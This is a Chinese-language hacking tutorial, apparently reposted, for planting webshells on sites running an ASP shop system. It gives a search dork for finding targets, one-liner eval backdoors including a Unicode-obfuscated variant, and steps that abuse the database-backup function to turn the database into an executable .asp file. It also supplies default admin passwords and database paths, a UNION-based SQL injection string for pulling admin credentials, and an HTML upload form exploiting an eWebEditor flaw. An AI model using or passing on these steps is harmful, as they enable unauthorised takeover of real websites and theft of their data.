备份文件生成在程序所在目录
关键词为:inurl:ShopMore.asp?id
利用方法有二
大前提条件:网站目录可写,且未删除文件备份功能
方法一:
前提条件:对方未修改数据库的默认地址
第一步:订购页面,直接在 产品名称,订购数量等输入一句话木马
<%eval request("ha")%>
第二步:备份数据库。数据库名为asp文件(这里注意:第一次备份的时候,程序会自动添加.MDB后缀,需要备份两次)注:会弹出要你登陆的框,不要管,再执行一下备份
第三步:一句话木马连接,上传shell
方法二:
前提条件:对方未修改EWEB的默认路径
第一步:直接在EWEB里上传一个图片后缀的木马。
第二步:备份数据库。数据库名为asp文件(这里注意:第一次备份的时候,程序会自动添加.MDB后缀,需要备份两次)注:会弹出要你登陆的框,不要管,再执行一下备份
第三步:备份后的就是你的shell了
原理
备份数据库程序文件验证过滤失误,导致程序在验证前先执行了备份数据库。
而订购信息是直接写入数据库的。
此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin password:198625
不能进的还可以试试
后台默认密码为86779533 abc123这两个
试试数据库默认地址为/data/#sze7xiaohu.mdb
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'=' 直接丢搜索栏也行
=======================
把.mdb解析成.asp后,就相当于把mdb的数据库改成asa或者asp。这里只要在数据库中写入一句话木马,便可以顺利的得到一个
webshell。对这个一句话怎么写呢?已经有很多先例了,想想新云那个。嘎嘎!
拿出unicode变形一句话,┼癥污爠煥敵瑳∨≡┩>密码a。注意变形一句话的时候,只要不出现?号就可以成功被执行!
从数据库中简单分析下,除了图片就是文章内容。要找个地方写入数据库,最好的地方就是留言簿了。
留言标题 留言性质 留言姓名 联系电话 联系邮箱 随意填写,留言内容:┼癥污爠煥敵瑳∨≡┩>
好了,一句连接下。
成功取得webshell,
文章转载自网管网:http://www.bitscn.com/network/hack/201008/189732.html
===========
补充:ewebeditor 5.5 可以利用oday
<form action="http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
